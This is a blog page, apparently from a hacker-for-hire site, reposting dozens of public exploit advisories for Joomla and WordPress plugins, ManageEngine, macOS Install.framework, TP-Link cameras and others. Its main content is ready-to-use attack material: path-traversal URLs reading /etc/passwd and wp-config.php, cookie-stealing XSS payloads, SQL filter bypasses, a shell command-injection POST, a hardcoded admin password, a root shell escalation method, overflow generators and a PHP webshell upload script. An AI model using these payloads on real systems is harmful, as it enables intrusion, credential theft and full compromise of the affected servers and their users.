Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863164517

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/56994/info

ZT Autolinks Component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_ztautolink&controller=../../../../../../../../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/56995/info

The Bit Component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_bit&controller=../../../../../../../../../../../../../../../etc/passwd%00
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=478

The Install.framework runner suid root binary does not correctly account for the fact that Distributed Objects
  can be connected to by multiple clients at the same time.

  By connecting two proxy objects to an IFInstallRunner and calling [IFInstallRunner makeReceiptDirAt:asRoot:]
  in the first and passing a custom object as the directory name we can get a callback to our code just after the
  makeReceiptDirAt code has called seteuid(0);setguid(0) to regain privs. Since BSD priviledges are per-process
  this means that our other proxy object will now have euid 0 without having to provide an authorization reference.

  In this second proxy we can then just call runTaskSecurely and get a root shell before returning from the first proxy's callback function
  which will then drop privs.

  build using the provided makefile and run passing the full path to the localhost shell

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38136.zip
HireHackking 
source: https://www.securityfocus.com/bid/57190/info


The Incapsula component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Incapsula 1.4.6_b and prior are vulnerable. 

http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Security.php?token="><script>alert(document.cookie)</script>

http://www.example.com/administrator/components/com_incapsula/assets/tips/en/Performance.php?token="><script>alert(document.cookie)</script>
HireHackking 
Exploit Title: ManageEngine EventLog Analyzer SQL query execution
Product: ManageEngine EventLog Analyzer
Vulnerable Versions: v10.6 build 10060 and previous versions
Tested Version: v10.6 build 10060 (Windows)
Advisory Publication: 14/09/2015
Vulnerability Type: authenticated SQL query execution
Credit: xistence <xistence[at]0x90.nl>

Product Description
-------------------

EventLog Analyzer carry out logs analysis for all Windows, Linux and Unix
systems, Switches and Routers (Cisco), other Syslog supporting devices, and
applications like IIS, MS SQL. Eventlog analyzer application is capable of
performing real-time log file analysis. Event log files analyzer
application can carry out log file analysis of imported files. The files
can be imported from the archive or from any machine.

When an important security event is generated on a machine in the network,
event log file analyser application collects, performs log analysis and
displays the event on the EventLog Analyzer Dashboard, in real-time. The
event log report is generated from the analyzed event logs. From the event
log reports (graphs), you can drill down to the raw log events and do a
root cause analysis within minutes, and then focus on resolving it.

The logging analyser application carry out imported and archived log files
analyses to fulfill the requirements of forensic analysis and event log
audit. The forensic and audit reports can be generated from the analyzed
logs.


Vulnerability Details
---------------------

Every user has the ability to execute SQL queries through the
"/event/runQuery.do" script, including the default "guest" user. (The SQL
query option is just not visible in the web interface)
Below is the POST request, executed as "guest":

POST /event/runQuery.do HTTP/1.1
Host: 192.168.2.116:8400
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=XXXXXXXXXX
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

execute=true&query=select+version%28%29


Access to queries starting with "INSERT" or "UPDATE" is denied by default,
however this can be bypassed by doing a select query first, like this:

"SELECT 1;INSERT INTO ..."

The included Postgres backend is running with SYSTEM privileges on Windows,
allowing to write files to disk with these privileges.

A Metasploit exploit module will be released shortly.


Solution
--------
ManageEngine has provided a patch to fix this issue, the steps to apply/fix
this are as below:

1. Stop the ELA service.
2. Download the zip from
http://bonitas2.zohocorp.com/zipUploads/2015_14_07_17_52_30_o_19q686iqs1sfemdf19e05sqre61.tar.gz
and extract the folders. You would have two folders "EventLogAnalyzerJSP"
and "LogAnalyzerClient"  under "o_19q686iqs1sfemdf19e05sqre61". Copy these
two folders and place it under <ELA Home>//lib/ folder.
3. The path of the following files would be as below:

runQuery_jsp.class --> <ELA
Home>\\lib\\EventLogAnalyzerJSP\\com\\adventnet\\sa\\jsp\\WEB_002dINF\\jsp
RunQuery.class --> <ELA Home>\\lib\\LogAnalyzerClient\\com\\adventnet\\la\

4. Restart the ELA service and check for the issue.


Advisory Timeline
-----------------

07/11/2015 - Discovery and vendor notification
07/13/2015 - ManageEngine acknowledged issue
07/14/2015 - ManageEngine supplied fix
07/16/2015 - Verified fix and replied back to ManageEngine that the issue
has been resolved
09/14/2015 - Public disclosure
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=477

Install.framework has a suid root binary here: /System/Library/PrivateFrameworks/Install.framework/Resources/runner
  This binary vends the IFInstallRunner Distributed Object, which has the following method:

  [IFInstallRunner makeReceiptDirAt:asRoot:]

  If you pass 1 for asRoot, then this code will treat the makeReceiptDirAt string as a path and make two directories
  (Library/Receipts) below it. At first glance this code looks immediately racy and no doubt we could play some
  symlink tricks to get arbitrary directories created, but, on second glance, we can do a lot more!

  This code is using distributed objects which is a "transparent" IPC mechanism: what this means in practise is that
  not only can I call methods on the IFInstallRunner object running in the suid root process, but I can also pass it objects
  from my process; when the suid root process then tries to call methods on those object this will actually result in callbacks
  into my process :)

  In this case rather than just passing an NSString as the makeReceiptDirAt parameter I create and pass an instance of my own class
  "InitialPathObject" which behaves a bit like a string but gives me complete control over its behaviour from my process.

  By creating a couple of this custom classes and implementing various methods we can reach calls to mkdir, chown and unlink with euid == 0.
  We can completely control the string passed to mkdir and unlink.
  In the chown case the code will chown our controlled path to root:admin; regular os x users are members of the admin group which means that this
  will give the user access to files which previously belonged to a different group.

  To hit the three actions (mkdir, chown and unlink) with controlled arguments we need to override various
  combinations of selectors and fail at the right points:

  InitialPathObject = the object we pass to the makeReceiptDirAt selector
    overrides: - stringByAppendingPathComponent
                 * will be called twice:
                    * first time:  return an NSString* pointing to a non-existant file
                    * second time: return SecondFakeStringObject

  SecondFakeStringObject = returned by the second call to stringByAppendingPathComponent
    overrides: - length
                 * will be called by the NSFileManager?
                 * return length of path to non-existant file
               - getCharacters:
                 * will be called by the NSFileManager?
                 * return character of the non-existant file path
               - fileSystemRepresentation
                 * for MKDIR:
                   * first time: return char* of the target path
                   * second time: return char* to non-existant file
                   * third time: return char* to non-existant file
                 * for CHOWN:
                   * first time: return char* of temporary directory to create and ignore
                   * second time: return char* of target path
                 * for UNLINK:
                   * first time: return char* of temporary directory to create and ignore
                   * second time: return char* to non-existant file
                   * third time: return char* to path to unlink
               - stringByAppendingPathComponent:
                 * for MKDIR:
                   * not called
                 * for CHOWN:
                   * return NSString* pointing to file which does exist // to bail out before creating /Receipts
                 * for UNLINK
                   * not called

  build: clang -o as_root_okay_then_poc as_root_okay_then_poc.m -framework Foundation
  run: ./as_root_okay_then_poc MKDIR|CHOWN|UNLINK <target>

  note that this will create some root-owned temporary directories in /tmp which will need to be manually cleaned up

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38137.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=314

The private Install.framework has a few helper executables in /System/Library/PrivateFrameworks/Install.framework/Resources,
one of which is suid root:

-rwsr-sr-x   1 root  wheel   113K Oct  1  2014 runner

Taking a look at it we can see that it's vending an objective-c Distributed Object :)
[ https://developer.apple.com/library/mac/documentation/Cocoa/Conceptual/DistrObjects/DistrObjects.html ]

The main function immediately temporarily drops privs doing
  seteuid(getuid()); setegid(getgid());

then reads line from stdin. It passes this to NSConnection rootProxyForConnectionWithRegisteredName to lookup that
name in the DO namespace and create a proxy to connect to it via.

It then allocates an IFInstallRunner which in its init method vends itself using a name made up of its pid, time() and random()

It then calls the setRunnerConnectionName method on the proxy to tell it the IFInstallRunner's DO name so that whoever
ran the runner can connect to the IFInstallRunner.

The IFRunnerMessaging protocol tells us the methods and prototypes of the remote methods we can invoke on the IFInstallRunner.

Most of the methods begin with a call to processKey which will set the euid back to root if the process can provide a valid admin
authorization reference from authd (I'm not totally sure how that bit works yet, but it's not important for the bug.) Otherwise the euid
will remain equal to the uid and the methods (like movePath, touchPath etc) will only run with the privs of the user.

The methods then mostly end with a call to restoreUIDs which will drop back to euid==uid if we did temporarily regain root privs (with the auth ref.)

Not all methods we can invoke are like that though...

IFInstallRunner setExternalAuthorizationRef calls

  seteuid(0);setegid(0);

to regain root privs without requiring any auth. It then calls AuthorizationCreateFromExternalForm passing the bytes of an NSData we give it.

If that call doesn't return 0 then the error branch calls syslog with the string: "Fatal error: unable to internalize authorization reference."
but there's actually nothing fatal, it just returns from the method, whereas the success branch goes on to restore euid and egid, which means
that if we can get AuthorizationCreateFromExternalForm to fail then we can get the priv dropping-regaining state machine out-of-sync :)

Getting AuthorizationCreateFromExternalForm to fail is trivial, just provide a malformed auth_ref (like "AAAAAAAAAAAAAAAAAAA" )

Now the next method we invoke will run with euid 0 even without having the correct auth ref :)

This PoC first calls setBatonPath to point the baton executable path to a localhost bind-shell then triggers the bug
and calls runTaskSecurely which will create an NSTask and launch the bind-shell with euid 0 :) We can then just nc to it and get a root shell

tl;dr:
the error path in setExternalAuthorizationRef should either be fatal or drop privs!

Make sure you have the latest xcode installed and run the get_shell.sh script to build and run the PoC.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38138.zip
HireHackking 
Exploit Title: ManageEngine OpManager multiple vulnerabilities
Product: ManageEngine OpManager
Vulnerable Versions: v11.5 and previous versions
Tested Version: v11.5 (Windows)
Advisory Publication: 14/09/2015
Vulnerability Type: hardcoded credentials, SQL query protection bypass
Credit: xistence <xistence[at]0x90.nl>


Product Description
-------------------

ManageEngine OpManager is a network, server, and virtualization monitoring
software that helps SMEs, large enterprises and service providers manage
their data centers and IT infrastructure efficiently and cost effectively.
Automated workflows, intelligent alerting engines, configurable discovery
rules, and extendable templates enable IT teams to setup a 24x7 monitoring
system within hours of installation.
Do-it-yourself plug-ins extend the scope of management to include network
change and configuration management and IP address management as well as
monitoring of networks, applications, databases, virtualization and
NetFlow-based bandwidth.


Vulnerability Details
---------------------

ManageEngine OpManager ships with a default account "IntegrationUser" with
the password "plugin". This account is hidden from the user interface and
will never show up in the user management. Also changing the password for
this account is not possible by default. The account however is assigned
Administrator privileges and logging in with this account is possible via
the web interface.

Below you can see the account in the PostgreSQL database after a fresh
installation:

C:\ManageEngine\OpManager\pgsql\bin>psql.exe -h 127.0.0.1 -p 13306 -U
postgres -d OpManagerDB
psql (9.2.4)

OpManagerDB=# select * from userpasswordtable where userid = 2;
userid | username | password | ownername | domainname | sipenabled
--------+-----------------+-----------+-----------+------------+------------
2 | IntegrationUser | d7962CgyJ | NULL | NULL | false
(1 row)

The above password decrypted is "plugin".

Any account that has access to the web interface with Administrator rights
can use a web form (/api/json/admin/SubmitQuery) to execute SQL queries on
the backend PostgreSQL instance.
By default restrictions apply and queries that start with
INSERT/UPDATE/DELETE are not allowed to be executed, this is however very
easy to bypass by using something like "INSERT/**/INTO...". The "/**/"
comment will create a space and the function is not detected by OpManager's
protection and will be executed.

The PostgreSQL environment runs as SYSTEM under Windows. By writing a WAR
payload to the "tomcat/webroot" directory, the WAR payload will be deployed
automatically and will give a shell with SYSTEM privileges.

A metasploit module will be release shortly.


Solution
--------

ManageEngine has provided a patch to fix this issue:
https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability


Advisory Timeline
-----------------

05/17/2015 - Discovery and vendor notification
05/22/2015 - ManageEngine acknowledged issue
07/10/2015 - Requested status update
07/17/2015 - ManageEngine supplied fix
07/24/2015 - ManageEngine provied definitive fix at
https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability
09/14/2015 - Public disclosure
HireHackking 
# Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary File Download (admin/colaborator required)
# Google Dork: -
# Date: 12/09/2015
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/elisqlreports/
# Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip
# Version: < 4.11.33, fixed in 4.11.37
# Tested on: Debian GNU/Linux 7 with Wordpress 4.3
# CVE : N/A
#
# Summary: The plugin allows a wordpress site administrator or
collaborator to download arbitrary files from the host file system
though the plugin functionality of downloading .sql, .sql.zip or
.sql.gz files created by the wordpress administrator.
# The file name to download is not sanitized and path traversal can be
injected in the request.
#
# Timeline:
# - 09/09/2015: Fist contact with the author
# - 11/09/2015: Author creates fix and communicate to me
# - 12/09/2015: Public release of the new plugin version

# POC: To retrieve the wp-config.php file:

GET /wp-admin/admin.php?page=ELISQLREPORTS-settings&Download_SQL_Backup=../../../wp-config.php
HTTP/1.1
Host: <the host with the wordpress>
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: <User-Agent>
Referer: http://<the host with the
wordpress>/wp-admin/admin.php?page=ELISQLREPORTS-settings
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_[...etc...]4af418c3efd


# Exploit Title: EZ SQL Reports < 4.11.37: Arbitrary Code Execution (admin/colaborator required)
# Google Dork: -
# Date: 12/09/2015
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/elisqlreports/
# Software Link: https://downloads.wordpress.org/plugin/elisqlreports.4.11.33.zip
# Version: < 4.11.33, fixed in 4.11.37
# Tested on: Debian GNU/Linux 7 with Wordpress 4.3
# CVE : N/A
#
# Summary: There are several calls to "passtthru" in the code, one of
them is receiving the username, password, database name and host from
the $_POST arguments, so you can inject in every of this parameter the
";" character or others like "&&" or "||" to execute other distinct
commands to "/usr/bin/mysql"
#
# Timeline:
# - 09/09/2015: Fist contact with the author
# - 11/09/2015: Author creates fix and communicate to me
# - 12/09/2015: Public release of the new plugin version

# POC: Send a POST request like this to obtain in the folder wp-admin
a file with name "testrce.txt". The parameters DB_NAME, DB_HOST,
DB_USER, and DB_PASSWORD are injectable:

POST /wp-admin/admin.php?page=ELISQLREPORTS-settings HTTP/1.1
Host: <wordpress web>
Proxy-Connection: keep-alive
Content-Length: 177
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://<wordpress web>
Upgrade-Insecure-Requests: 1
User-Agent: <the user agent>
Content-Type: application/x-www-form-urlencoded
Referer: http://<wordpress web>/wp-admin/admin.php?page=ELISQLREPORTS-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,es;q=0.6
Cookie: wordpress_8fa[...etc...]b7d

DB_NAME=<the db
name>%3B+touch+testrce.txt%3B+&DB_HOST=127.0.0.1&DB_USER=<theuser>&DB_PASSWORD=<thepassword>&db_date=z.2015-08-27-20-22-29.manual.wp.127.0.0.1.sql.zip&db_nonce=au78c5ff86
HireHackking 
source: https://www.securityfocus.com/bid/57212/info

Dell OpenManage Server Administrator is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

OpenManage Server Administrator 7.1.0.1 and prior versions are vulnerable. 

https://www.example.com:1311/help/sm/en/Output/wwhelp/wwhimpl/js/html/index_main.htm?topic="></iframe><iframe src="javascript:alert(/xss/)
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-IKEVIEWR60-0914.txt



Vendor:
================================
www.checkpoint.com
http://pingtool.org/downloads/IKEView.exe



Product:
==================================================
IKEView.exe Feature Pack NGX R60 - Build 591000004

IKEVIew.EXE is used to inspect - internet private key exchanges on the
Firewall
phase(1 & 2) packets being exchanged with switches and gateways.


IKEVIEW is a Checkpoint Partner tool available for VPN troubleshooting
purposes.
It is a Windows executable that can be downloaded from Checkpoint.com.
This file parses the IKE.elg file located on the firewall.

To use IKEVIEW for VPN troubleshooting do the following:

1. From the checkpoint firewall type the following:

vpn debug ikeon

This will create the IKE.elg file located in $FWDIR/log


2. Attempt to establish the VPN tunnel. All phases of the connection will
be logged to the IKE.elg file.


3. SCP the file to your local desktop.
WINSCP works great

4. Launch IKEVIEW and select File>Open. Browse to the IKE.elg file.



Vulnerability Type:
======================
Stack Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=====================
IKEView.exe is vulnerable to local stack based buffer overflow when parsing
an malicious (internet key exchange) ".elg" file.
Vulnerability causes nSEH & SEH pointer overwrites at 4432 bytes after
IKEView parses our malicious file, which may result then
result in arbitrary attacker supplied code execution.

Tested on Windows SP1


0018F868  |41414141  AAAA
0018F86C  |01FC56D0  ÐVü  ASCII "File loaded in 47 minutes, 00 seconds."
0018F870  |41414141  AAAA
0018F874  |41414141  AAAA  Pointer to next SEH record
0018F878  |42424242  BBBB  SE handler
0018F87C  |00000002   ...


Quick Buffer Overflow POC :
===========================


1) Below python file to create POC save as .py it will generate POC file,
open in IKEView.exe and KABOOOOOOOOOOOOOOOOOOOOM!

seh="B"*4 #<----------will overwrite SEH with bunch of 42's HEX for 'B'
ASCII char.

file="C:\\IKEView-R60-buffer-overflow.elg"
x=open(file,"w")
payload="A"*4428+seh
x.write(payload)
x.close()

print "\n=======================================\n"
print " IKEView-R60-buffer-overflow.elg file created\n"
print " hyp3rlinx ..."
print "=========================================\n"



Exploitation Technique:
=======================
Local



Severity Level:
=========================================================
High



Description:
==========================================================


Vulnerable Product:             [+] IKEView.exe Feature Pack NGX R60 -
Build 591000004


Vulnerable File Type:           [+] .elg


Affected Area(s):               [+] Local OS


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
source: https://www.securityfocus.com/bid/57200/info

The NextGEN Gallery plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

NextGEN Gallery 1.9.10 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=[Xss]
HireHackking 
source: https://www.securityfocus.com/bid/57230/info
  
TinyBrowser is prone to multiple vulnerabilities.
  
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
  
http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
HireHackking 
source: https://www.securityfocus.com/bid/57230/info
   
TinyBrowser is prone to multiple vulnerabilities.
   
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
   
http://www.example.com/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=
HireHackking 
'''
********************************************************************************************
# Exploit Title: Total Commander 32bit SEH Overwrite.
# Date: 8/27/2015
# Exploit Author: Un_N0n
# Software Vendor: http://www.ghisler.com/
# Software Link: http://www.ghisler.com/download.htm
# Version: 8.52
# Tested on: Windows 8 x64(64 BIT)
********************************************************************************************
[Info:]
EAX 00106541 
ECX FFFFFEFA
EDX 0031E941
EBX 04921F64
ESP 001065FC 
EBP 41414141
ESI 04930088
EDI 0031E9B0

EIP 41414141

SEH chain of main thread, item 0
	Address=001065FC
	SE handler=41414141
'''

[Steps to Produce the Crash]:
1- Open up 'TOTALCMD.EXE'.
2- Goto Files -> Change Attributes.
3- In time field paste in contents of 'Crash.txt'.
~ Software will crash b/c SEH Overwrite.

[Code for CRASH.txt]
file = open("crash.txt",'w')
file.write("A"*5000)
file.close()

->After Reporting,
	Vendor has released(bugfix release) a new version(8.52a[9th SEPT 2015]).
**********************************************************************************************
HireHackking 
source: https://www.securityfocus.com/bid/57230/info
    
TinyBrowser is prone to multiple vulnerabilities.
    
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
    
http://www.example.com/js/tiny_mce/plugins/tinybrowser/edit.php?type=
HireHackking 
TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi Hard-Coded Credentials
Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us
Affected version: NC220 V1 1.0.28 Build 150629 Rel.22346
                  NC200 V1 2.0.15 Build 150701 Rel.20962

Summary: Designed with simplicity in mind, TP-LINK's Cloud Cameras are a
fast and trouble free way to keep track on what's going on in and around
your home. Video monitoring, recording and sharing has never been easier
with the use of TP-LINK’s Cloud service. The excitement of possibilities
never end.

Desc: NC220 and NC200 utilizes hard-coded credentials within its Linux
distribution image. These sets of credentials (root:root) are never exposed
to the end-user and cannot be changed through any normal operation of the
camera.

Tested on: Linux


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5255
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php


20.07.2015

--


Initializing...
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin |grep root
root_uImage
p2048_newroot.cer
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh
Nproot:x:0:
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin | grep home > crack.me
root@zslab:~# john crack.me
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
root             (root)
guesses: 1  time: 0:00:00:00 DONE (Mon Aug  3 05:52:55 2015)  c/s: 400  trying:
root - Userroot
Use the "--show" option to display all of the cracked passwords reliably
root@zslab:~# john crack.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh

1 password hash cracked, 0 left
root@zslab:~#
HireHackking 
# Exploit Title: WordPress: cp-reservation-calendar 1.1.6  SQLi injection]
# Date: 2015-09-15
# Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip
# Version: 1.1.6
# OWASP Top10: A1-Injection

A vulnerability has been detected in the WordPress cp reservation calendar Plugin v1.6.
The vulnerability allows remote attackers to inject SQL commands.
The sql injection vulnerability is located in the `dex_reservations.php` file.
Remote attackers are able to execute own sql commands by manipulation of requested parameters. 

The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

============================
vulnerable function code...
============================

function dex_reservations_calendar_load2() {
    global $wpdb;
	if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' )
		return;
    @ob_clean();
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Pragma: no-cache");

    //following line is vulnerable...

    $calid = str_replace  (TDE_RESERVATIONCAL_PREFIX, "",$_GET["id"]);
    $query = "SELECT * FROM ".TDE_RESERVATIONCALENDAR_DATA_TABLE." where ".TDE_RESERVATIONDATA_IDCALENDAR."='".$calid."'";
    $row_array = $wpdb->get_results($query,ARRAY_A);
    foreach ($row_array as $row)
    {        
        $d1 =  date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_S])); 
        $d2 =  date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_E]));

        echo $d1."-".$d2."\n";
        echo $row[TDE_RESERVATIONDATA_TITLE]."\n";
        echo $row[TDE_RESERVATIONDATA_DESCRIPTION]."\n*-*\n";
    }

    exit();
}

The following URL executes vulnerable function:

http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1
------------------------------------------------------------------------------------
POC using sqlmap tool::::

python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1"
 -p id --level=5 --risk=3 --dbms="MySQL" --dbs

##########################################################################

The following URL is too vulnerable

http://localhost/wordpress/?action=dex_reservations_check_posted_data

post parameters::::
-------------------------------------
dex_reservations_post=1&dex_item=1
------------------------------------

An unauthenticated user can use the following URL to inject malicious SQL code.
[dex_item] on POST parameter is vulnerable

======================
   vulnerable code 
=====================

is located in `dex_reservations.php`

function code..

function dex_reservations_get_option ($field, $default_value)
{
    global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
    if ($dex_option_buffered_id == CP_CALENDAR_ID)
        $value = $dex_option_buffered_item->$field;
    else
    {
       $myrows = $wpdb->get_results( "SELECT * FROM ".DEX_RESERVATIONS_CONFIG_TABLE_NAME." WHERE id=".CP_CALENDAR_ID );
       $value = $myrows[0]->$field;
       $dex_option_buffered_item = $myrows[0];
       $dex_option_buffered_id  = CP_CALENDAR_ID;
    }
    if ($value == '' && $dex_option_buffered_item->calendar_language == '')
        $value = $default_value;
    return $value;
}


When this function is called the defined CP_CALENDAR_ID must contains an integer but it isn't validating the parameter
[ CP_CALENDAR_ID ]
---------------------------------------------------------------------------- 
POC using sqlmap tool::::

python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_check_posted_data" --data="dex_reservations_post=1&dex_item=1"
 -p dex_item --dbms="MySQL" --level=5 --risk=3


 #############
 time-line

 2015-03-01: vulnerability found
 2015-03-09: reported to vendor
 2015-03-21-: released cp_reservation_calendar v1.1.7
 2015-09-15: full disclosure
HireHackking 
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-FILE-UPLOAD.txt



Vendor:
=========================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp



Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).



Vulnerability Type:
===================
Unrestricted File Upload



CVE Reference:
==============
N/A




Vulnerability Details:
=====================

Application specifies Plugin files (.jar) can be uploaded directly by using
the form, however so can the following.

.exe
.php
.jsp
.py
.sh



Exploit code(s):
===============

1) choose some malicious file using the File browser
2) click 'upload plugin'

http://localhost:9090/plugin-admin.jsp

Our malicious uploaded files will be stored under /openfire/plugins
directory.



Disclosure Timeline:
=========================================================

Vendor Notification:  NA
Sept 14, 2015 : Public Disclosure



Exploitation Technique:
=======================
Local



Severity Level:
=========================================================
Medium



Description:
==========================================================


Request Method(s):              [+] POST


Vulnerable Product:             [+] Openfire 3.10.2


Vulnerable Parameter(s):        [+] fileName


Affected Area(s):               [+] Server


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
HireHackking 
source: https://www.securityfocus.com/bid/57064/info

cPanel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/frontend/x3/files/dir.html?showhidden=1&dir=%3Cimg%20src=x%20onerror=prompt%280%29;%3E
HireHackking 
source: https://www.securityfocus.com/bid/57098/info

The Xerte Online plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Xerte Online 0.32 is vulnerable; other versions may also be affected.

##################################################
# Description : Wordpress Plugins - Xerte Online Arbitrary File Upload Vulnerability
# Version : 0.32
# Link : http://wordpress.org/extend/plugins/xerte-online/
# Plugins : http://downloads.wordpress.org/plugin/xerte-online.0.32.zip
# Date : 30-12-2012
# Google Dork : inurl:/wp-content/plugins/xerte-online/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################

Exploit :

PostShell.php
<?php

$code = "[CODE PHP]";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/save.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('filename'=>"/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php",
                'filedata'=>"$code"));
